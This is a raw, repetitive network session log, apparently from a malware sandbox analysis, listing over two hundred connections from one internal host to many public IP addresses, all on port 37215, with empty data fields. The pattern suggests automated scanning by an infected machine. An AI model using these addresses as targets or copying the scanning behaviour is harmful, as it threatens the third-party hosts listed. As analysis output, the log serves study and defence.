                                                  5174192.168.2.1333320157.33.111.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5175192.168.2.1348474157.126.226.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5176192.168.2.1351052197.196.28.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5177192.168.2.1352946197.190.141.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5178192.168.2.1352316112.33.112.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5179192.168.2.135329241.144.238.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5180192.168.2.1353056221.6.135.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5181192.168.2.1346070165.123.28.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5182192.168.2.134612441.0.80.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5183192.168.2.134510641.43.65.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5184192.168.2.1350812141.109.172.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5185192.168.2.1341554197.200.244.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5186192.168.2.1349866197.101.244.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5187192.168.2.1351576197.70.122.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5188192.168.2.1345816157.80.230.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5189192.168.2.1359160197.197.77.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5190192.168.2.1357750157.236.212.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5191192.168.2.133883841.195.177.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192192.168.2.1348696197.159.237.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5193192.168.2.135807082.245.208.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5194192.168.2.1358982157.232.212.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5195192.168.2.135288481.212.213.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5196192.168.2.1335818157.57.219.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5197192.168.2.1346320197.81.195.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5198192.168.2.134527441.164.104.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5199192.168.2.1352576157.246.100.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5200192.168.2.1352226157.127.29.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5201192.168.2.133712812.19.151.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5202192.168.2.1351848157.12.176.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5203192.168.2.1333716157.210.153.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5204192.168.2.1355580157.113.186.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5205192.168.2.1356700157.231.184.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5206192.168.2.1336970197.185.200.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5207192.168.2.1336454157.5.20.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5208192.168.2.1347082157.215.228.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5209192.168.2.1351818197.82.100.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5210192.168.2.133311641.186.166.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5211192.168.2.133828641.0.20.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5212192.168.2.1350336146.235.145.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5213192.168.2.1351740197.73.187.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5214192.168.2.1333136111.101.49.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5215192.168.2.1336936157.146.106.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5216192.168.2.1359844157.160.59.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5217192.168.2.1339190197.24.125.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5218192.168.2.1356184200.41.175.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5219192.168.2.1344284197.180.144.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5220192.168.2.135865699.4.138.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5221192.168.2.1349582157.37.55.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5222192.168.2.1345582119.15.130.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5223192.168.2.133337441.151.27.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5224192.168.2.13526228.249.73.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5225192.168.2.1348966109.63.35.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5226192.168.2.133781841.42.123.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5227192.168.2.1342826165.219.243.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5228192.168.2.1360508197.84.252.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5229192.168.2.1347074197.167.165.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5230192.168.2.1347544197.90.111.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5231192.168.2.135349041.72.95.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5232192.168.2.1357366197.172.51.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5233192.168.2.1345146157.241.104.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5234192.168.2.1336956197.223.180.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5235192.168.2.1352008157.202.34.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5236192.168.2.1354936197.125.77.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5237192.168.2.1336226130.173.90.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5238192.168.2.134570041.27.145.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5239192.168.2.1351890140.254.106.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5240192.168.2.13525722.188.219.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5241192.168.2.133743641.42.63.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5242192.168.2.1351806157.154.90.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5243192.168.2.134665041.84.77.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5244192.168.2.133457241.35.116.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5245192.168.2.135468097.241.49.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5246192.168.2.134386241.236.34.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5247192.168.2.133851241.122.233.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5248192.168.2.134854041.74.146.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5249192.168.2.133890662.174.160.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5250192.168.2.1349776157.185.84.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5251192.168.2.1342616157.81.102.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5252192.168.2.1333214197.68.91.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5253192.168.2.1345066197.78.255.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5254192.168.2.1343538157.86.152.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5255192.168.2.1336344147.182.10.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5256192.168.2.1358048157.86.190.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5257192.168.2.1337174203.238.3.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5258192.168.2.1348414157.81.67.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5259192.168.2.1342958157.102.89.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5260192.168.2.134662253.138.34.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5261192.168.2.1342460197.24.154.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5262192.168.2.1360462170.118.160.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5263192.168.2.1340104173.234.192.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5264192.168.2.134924466.90.36.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5265192.168.2.1350406197.21.123.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5266192.168.2.1346554157.41.130.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5267192.168.2.135343241.227.60.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5268192.168.2.1350744157.149.239.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5269192.168.2.1343054157.204.132.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5270192.168.2.1349956157.170.137.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5271192.168.2.1343270160.207.243.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5272192.168.2.135145241.165.120.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5273192.168.2.135885441.88.74.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5274192.168.2.133774641.144.34.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5275192.168.2.135026871.119.225.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5276192.168.2.1341282197.2.151.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5277192.168.2.134825241.21.68.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5278192.168.2.1343636197.119.147.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5279192.168.2.1349728197.175.217.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5280192.168.2.1348224197.228.250.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5281192.168.2.135039041.62.241.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5282192.168.2.1356000197.64.231.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5283192.168.2.1335430197.231.141.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5284192.168.2.1339676157.116.47.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5285192.168.2.133931277.31.149.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5286192.168.2.1342842157.117.73.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5287192.168.2.1358044157.111.251.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5288192.168.2.1335042197.8.61.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5289192.168.2.1341640166.104.214.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5290192.168.2.133793041.23.225.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5291192.168.2.135150241.70.40.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5292192.168.2.1350062197.100.220.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5293192.168.2.135512241.153.160.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5294192.168.2.1358162168.199.5.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5295192.168.2.135979841.106.18.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5296192.168.2.1345802154.31.174.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5297192.168.2.1358932157.9.35.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5298192.168.2.1343322174.5.68.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5299192.168.2.1339720197.105.129.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5300192.168.2.1348030197.87.201.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5301192.168.2.1335850197.105.91.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5302192.168.2.133332841.43.190.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5303192.168.2.1355990157.179.116.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5304192.168.2.1334328156.100.225.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5305192.168.2.134021441.87.29.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5306192.168.2.134590641.118.253.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5307192.168.2.134926875.214.105.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5308192.168.2.134118441.25.171.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5309192.168.2.1340830197.196.110.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5310192.168.2.1356000197.94.33.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5311192.168.2.134495241.134.98.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5312192.168.2.1356646187.178.233.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5313192.168.2.1359278204.199.243.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5314192.168.2.1348448197.96.157.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5315192.168.2.133356241.207.232.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5316192.168.2.1360432157.50.83.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5317192.168.2.134752813.253.63.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5318192.168.2.1339500157.36.95.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5319192.168.2.135767020.48.0.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5320192.168.2.135788041.63.76.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5321192.168.2.1342664157.64.61.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5322192.168.2.1344498157.140.126.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5323192.168.2.1350476157.99.152.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5324192.168.2.1360064184.179.158.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5325192.168.2.134632841.83.111.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5326192.168.2.1351956197.210.23.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5327192.168.2.134372841.120.239.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5328192.168.2.135955641.232.114.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5329192.168.2.133575474.7.76.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5330192.168.2.1353610197.174.93.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5331192.168.2.1360178197.50.121.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5332192.168.2.1351692197.25.157.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5333192.168.2.1332996157.167.30.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5334192.168.2.1349322157.244.149.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5335192.168.2.133572631.166.36.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5336192.168.2.1332908197.31.1.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5337192.168.2.134741641.163.172.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5338192.168.2.135583858.47.172.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5339192.168.2.1344140197.87.235.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5340192.168.2.133370641.18.153.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5341192.168.2.1347136178.38.110.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5342192.168.2.1334162197.109.93.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5343192.168.2.1360674196.132.128.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5344192.168.2.13585689.185.213.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5345192.168.2.1352362197.117.153.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5346192.168.2.1355390219.103.16.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5347192.168.2.1341824197.127.96.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5348192.168.2.1357802157.27.88.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5349192.168.2.1354236197.196.21.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5350192.168.2.1357056157.239.108.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5351192.168.2.134512041.25.146.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5352192.168.2.135981241.102.107.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5353192.168.2.1349530157.232.235.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5354192.168.2.133656484.118.56.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5355192.168.2.13498424.134.245.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5356192.168.2.134729441.162.125.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5357192.168.2.1353974197.233.176.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5358192.168.2.1353428197.20.111.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5359192.168.2.1338352157.168.231.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5360192.168.2.1333232197.124.142.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5361192.168.2.1333880197.181.146.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5362192.168.2.1353816106.80.99.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5363192.168.2.1340262157.130.55.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5364192.168.2.133693241.183.250.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5365192.168.2.1340870219.29.187.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5366192.168.2.135141894.251.184.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5367192.168.2.1349602197.172.78.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5368192.168.2.1338272157.136.6.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5369192.168.2.1340636197.150.91.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5370192.168.2.134082441.254.221.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5371192.168.2.134610241.255.43.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5372192.168.2.1355946157.203.23.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5373192.168.2.1356790157.196.242.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5374192.168.2.1344196157.177.89.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5375192.168.2.1342628197.102.244.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5376192.168.2.1350472199.12.116.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5377192.168.2.135372841.59.20.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5378192.168.2.1344394111.33.85.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5379192.168.2.1334398157.67.135.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5380192.168.2.1349524197.227.20.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5381192.168.2.134158641.107.3.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5382192.168.2.1347172197.68.50.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5383192.168.2.135611641.64.90.14237215
